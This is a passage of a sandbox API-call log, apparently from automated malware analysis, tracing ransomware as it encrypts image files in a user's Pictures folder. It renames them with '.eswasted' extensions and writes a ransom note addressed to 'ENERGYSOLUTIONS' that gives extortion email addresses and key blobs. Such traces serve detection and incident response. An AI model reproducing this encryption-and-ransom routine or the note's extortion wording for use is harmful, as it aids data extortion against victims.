hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0081.365] CloseHandle (hObject=0x110) returned 1 [0081.378] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0081.378] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x50aaa0 | out: hHeap=0x4a0000) returned 1 [0081.378] _aulldvrm () returned 0x0 [0081.378] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0081.379] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0081.379] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.379] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\bjArMd2\\qRyXslAH0NPG\\ZxuuDMz7.jpg") returned 114 [0081.379] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2ee) returned 0x4ef648 [0081.379] lstrcpyW (in: lpString1=0x4ef72c, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0081.379] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0081.379] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0081.380] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0081.380] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.380] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\bjArMd2\\qRyXslAH0NPG\\ZxuuDMz7.jpg.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\zr-guqe-ogahp2biq\\bjarmd2\\qryxslah0npg\\zxuudmz7.jpg.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0081.381] WriteFile (in: hFile=0x110, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0081.383] SetEndOfFile (hFile=0x110) returned 1 [0081.383] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.383] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0081.383] lstrcpyW (in: lpString1=0x4ef72c, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0081.383] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\bjArMd2\\qRyXslAH0NPG\\ZxuuDMz7.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\zr-guqe-ogahp2biq\\bjarmd2\\qryxslah0npg\\zxuudmz7.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\bjArMd2\\qRyXslAH0NPG\\ZxuuDMz7.jpg.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\zr-guqe-ogahp2biq\\bjarmd2\\qryxslah0npg\\zxuudmz7.jpg.eswasted")) returned 1 [0081.384] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\bjArMd2\\qRyXslAH0NPG\\ZxuuDMz7.jpg.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\zr-guqe-ogahp2biq\\bjarmd2\\qryxslah0npg\\zxuudmz7.jpg.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0081.385] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x100 [0081.385] GetFileSize (in: hFile=0x118, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x5215 [0081.385] MapViewOfFile (hFileMappingObject=0x100, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5215) returned 0x2d0000 [0081.385] CloseHandle (hObject=0x118) returned 1 [0081.388] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0081.389] CloseHandle (hObject=0x100) returned 1 [0081.389] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4d91a8 [0081.389] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0081.390] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d91f0 | out: pbBuffer=0x4d91f0) returned 1 [0081.390] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.390] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0081.390] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0081.390] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.447] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4ddfd8 [0081.447] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0081.447] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e9fd8 [0081.447] _snwprintf (in: _Dest=0x4e9fd8, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]A2EneEaOgeEWqZIlLudN8l0tnFS0P3XwyeZUMY7y6JPOhvmA1V5KIWdlQORBEXc6\r\nYBFnhHasqHo5CacOZ9cY4YAR27SGjnOsY0IWyG/Q3rQcqfE7+VLcnD4ZSuhBU+b9\r\nOvgmSUcQ+xpDgh2CZrgrdObLYQQTfeBtPKB+qw/MqEiyqUAQ00hwqV9xhMczFvCQ\r\nl8sL9zS3r8QkhG5d7LJ80KQiCwEL1cPoaDzs6aOlh6QbTXA92VErDZ0zVxSJiLEW\r\nwYM9BGEPtC50Q/qN8TxzocWcR8wQl64Z75ZHCkswie2chv9Qx3moEdM/WHRO8GC/\r\nkHwMbqmR3jSmZMF82oJMP89T8bAR0q9NJor81DgUthJ92xtrtR4JwM9fO7HnIeMP\r\nyS0H7CFOeVGy8v27QED+sZ2JSwXHnVF7jIdAHxCj3eRthli+aN8c4PmFZLElx8Wi\r\noN5VHw6RrqVIRE+Wkh5FsLjoRuWaYC6ip+TkRIsS5BK8oHRxx8KElyJ8SfqE+v5X\r\n/T3k1h64Lo0H9X0TFWVYXxD+LcKrp8FA1QzqFJtCzmRNaTKGP04DqBsOVxQdDIg2\r\nBUkbbunmj/EBYnvanCXwdnjEW/IJ6bHWvLrCLuCOv22rXcRyClX/6JfEVWEOIpPm\r\nYRGtIwxhYH8onb+78apGwenvm7d2RPc0x5yP+RiXZKK=[end_key]\r\nKEEP IT\r\n") returned 990 [0081.447] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ddfd8 | out: hHeap=0x4a0000) returned 1 [0081.447] WriteFile (in: hFile=0x110, lpBuffer=0x4e9fd8*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x121fef8, lpOverlapped=0x0 | out: lpBuffer=0x4e9fd8*, lpNumberOfBytesWritten=0x121fef8*=0x7bc, lpOverlapped=0x0) returned 1 [0081.447] SetEndOfFile (hFile=0x110) returned 1 [0081.449] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0081.449] CloseHandle (hObject=0x110) returned 1 [0081.451] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef648 | out: hHeap=0x4a0000) returned 1 [0081.451] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x50ad20 | out: hHeap=0x4a0000) returned 1 [0081.451] _aulldvrm () returned 0x0 [0081.451] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0081.452] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0081.452] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.452] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\bjArMd2\\Y9tw1zGGAtmh22x.bmp") returned 108 [0081.452] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2e2) returned 0x4d91a8 [0081.452] lstrcpyW (in: lpString1=0x4d9280, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0081.452] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e9fd8 [0081.452] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0081.453] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4e9fd8 | out: pbBuffer=0x4e9fd8) returned 1 [0081.453] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.453] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\bjArMd2\\Y9tw1zGGAtmh22x.bmp.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\zr-guqe-ogahp2biq\\bjarmd2\\y9tw1zggatmh22x.bmp.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0081.454] WriteFile (in: hFile=0x110, lpBuffer=0x4e9fd8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4e9fd8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0081.455] SetEndOfFile (hFile=0x110) returned 1 [0081.455] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.455] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0081.455] lstrcpyW (in: lpString1=0x4d9280, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0081.455] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\bjArMd2\\Y9tw1zGGAtmh22x.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\zr-guqe-ogahp2biq\\bjarmd2\\y9tw1zggatmh22x.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\bjArMd2\\Y9tw1zGGAtmh22x.bmp.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\zr-guqe-ogahp2biq\\bjarmd2\\y9tw1zggatmh22x.bmp.eswasted")) returned 1 [0081.456] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\bjArMd2\\Y9tw1zGGAtmh22x.bmp.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\zr-guqe-ogahp2biq\\bjarmd2\\y9tw1zggatmh22x.bmp.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0081.456] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x100 [0081.456] GetFileSize (in: hFile=0x118, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0xd864 [0081.456] MapViewOfFile (hFileMappingObject=0x100, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd864) returned 0x2d0000 [0081.457] CloseHandle (hObject=0x118) returned 1 [0081.462] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0081.462] CloseHandle (hObject=0x100) returned 1 [0081.462] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4ef440 [0081.462] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0081.463] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4ef488 | out: pbBuffer=0x4ef488) returned 1 [0081.463] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.463] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0081.464] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0081.464] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.473] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4ddfd8 [0081.473] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef440 | out: hHeap=0x4a0000) returned 1 [0081.473] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e9fd8 [0081.473] _snwprintf (in: _Dest=0x4e9fd8, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]g1s0YLdb7Qz+79YikhCYUsEVE/grY0aZIWyq10QJk7o/tfwfjdKqAdeVn1Ja1U+d\r\nLy5wam5ll4ieNDtUd5eUCLWUQcoU2ouRal0kCftEvc/ut6FqvXFQUL9gyKrYGMTG\r\nv+9srRvgJu+Np4A8a9nSF35KXKyiwbj4FC0ZSAQ7p3VaIcjAWC9XbYNpTTo4nOTN\r\nSjJEqZes/85YUu2KAYHneW9T18fnEj2WKSZj4Su6uiL1d3JCw/Ci5m3MmHkpSlzl\r\na4NpE4S41JpPoJjR6LTNqEPBknudaIsXkIn8M2yyBopTGdetjG9xcgOBvtg0JVoE\r\nrMcj5giSh0OQ0Y0k3ZhjMSQmb76EFEGuerOQQBfXQ/w9jq2tiGbLoASPf4TQqlvA\r\n2SxmQ20iISEbdW2W9qOHvJpmT3la+8ub3dLzubopx9KKeqoC8Eo+eaCM0JVmYurY\r\nAK7hAhs+SDyHhdRZwo9leLgQD+pWNRt1a2rxJTyuNmX1z6V/dO3kPSn3aWwNUMbl\r\nlLpjLuLRyCqI+uxIUKVzSXV7UOF/X9SJLaTp5mQdhaUYSjdVVgfmM5/P7wH49HiU\r\nuLBAv4j7pVSL0OKzq7jVB4BB9GsmNj6acayp3v0wGF8TjXYNlc9szceG4mWyKkCU\r\ncbMu+s44JweTrZq7qavtF46OZ+pU4tlvsNP9atkcl4w=[end_key]\r\nKEEP IT\r\n") returned 990 [0081.473] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ddfd8 | out: hHeap=0x4a0000) returned 1 [0081.473] WriteFile (in: hFile=0x110, lpBuffer=0x4e9fd8*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x121fef8, lpOverlapped=0x0 | out: lpBuffer=0x4e9fd8*, lpNumberOfBytesWritten=0x121fef8*=0x7bc, lpOverlapped=0x0) returned 1 [0081.473] SetEndOfFile (hFile=0x110) returned 1 [0081.476] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0081.476] CloseHandle (hObject=0x110) returned 1 [0081.478] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0081.478] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x50b0c8 | out: hHeap=0x4a0000) returned 1 [0081.478] _aulldvrm () returned 0x0 [0081.478] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0081.479] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0081.479] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.479] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\C9OMdvdKnuBpRQ6Y.jpg") returned 101 [0081.479] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2d4) returned 0x4d91a8 [0081.479] lstrcpyW (in: lpString1=0x4d9272, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0081.479] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e9fd8 [0081.479] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0081.480] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4e9fd8 | out: pbBuffer=0x4e9fd8) returned 1 [0081.480] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.480] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\C9OMdvdKnuBpRQ6Y.jpg.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\zr-guqe-ogahp2biq\\c9omdvdknubprq6y.jpg.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0081.481] WriteFile (in: hFile=0x110, lpBuffer=0x4e9fd8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4e9fd8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0081.482] SetEndOfFile (hFile=0x110) returned 1 [0081.482] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.482] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0081.482] lstrcpyW (in: lpString1=0x4d9272, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0081.482] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\C9OMdvdKnuBpRQ6Y.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\zr-guqe-ogahp2biq\\c9omdvdknubprq6y.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\C9OMdvdKnuBpRQ6Y.jpg.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\zr-guqe-ogahp2biq\\c9omdvdknubprq6y.jpg.eswasted")) returned 1 [0081.483] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\C9OMdvdKnuBpRQ6Y.jpg.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\zr-guqe-ogahp2biq\\c9omdvdknubprq6y.jpg.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0081.483] CreateFileMappingW (hFile=0x100, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0081.483] GetFileSize (in: hFile=0x100, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0xb516 [0081.483] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xb516) returned 0x2d0000 [0081.484] CloseHandle (hObject=0x100) returned 1 [0081.487] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0081.487] CloseHandle (hObject=0x118) returned 1 [0081.487] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4ef440 [0081.487] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0081.488] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4ef488 | out: pbBuffer=0x4ef488) returned 1 [0081.488] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.488] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0081.489] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0081.489] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.549] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4ddfd8 [0081.549] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef440 | out: hHeap=0x4a0000) returned 1 [0081.549] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0081.549] _snwprintf (in: _Dest=0x4dd498, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]m9S0nBOIDgpV8IxSLOj2APtrmOvDcwgg7bAXgaWZFGVK4vdIKPs9P6W9byUSFAnT\r\nW5evlICCzvxo51gV9XJznDmxAhoGNOpXRqwzG9WxXUzp/ThRjNT6f2y9/petnUHV\r\nBcxfcz0jyuTwfum/m6KPhxpcyNtvJUKVsyY9MgIRr2ikBDXCTJs0FJK7EWRzj/eh\r\nxLaaW36pFtG3nP4yD4a/bhNaVBRHqD6i4mOsuOBg0QGAlyUhqVpjAnWBdLSk6V49\r\ncVHDM6JHCsSeVyFxWxDcoLSwHdz2IkfBVqwORQVgeZ4uLFDUpqeHtYZiC9y7hV/v\r\nyz8CFNdpVSxrc0NcLlUeezM3xgGzZrhLhYvC5SBAfYHppWTxx+iO/QIFYCezokpK\r\nBWT+JP0yXSGGGh616vW02HMf1magNSm2Au7w+vnBNP0sfLcW2RR/Xop1P0EwEBqi\r\n8rOOXzjPUD71HdpIfDnTxWzTbmuUnaN8+BBwbELVTtmwPfZCcUKK/sllEFaeUujN\r\nCosD25d5xO/0jLuXrzTYCXp1XLufynUsUeoGVPi4A13HXuV3+wGgMdGTAAB0I0M9\r\ndKUpPjqvrG6EiW4jPSpAc+9Qz0+BAzhlhmNc3elMb03I9Ahuscv4t3IklQ7v8XRa\r\nawtVmqC16Lru+BEzhNcj9KtDajLZVPjrc8JL72/4ErD=[end_key]\r\nKEEP IT\r\n") returned 990 [0081.549] HeapFree (in: hHeap=0x4a0000, 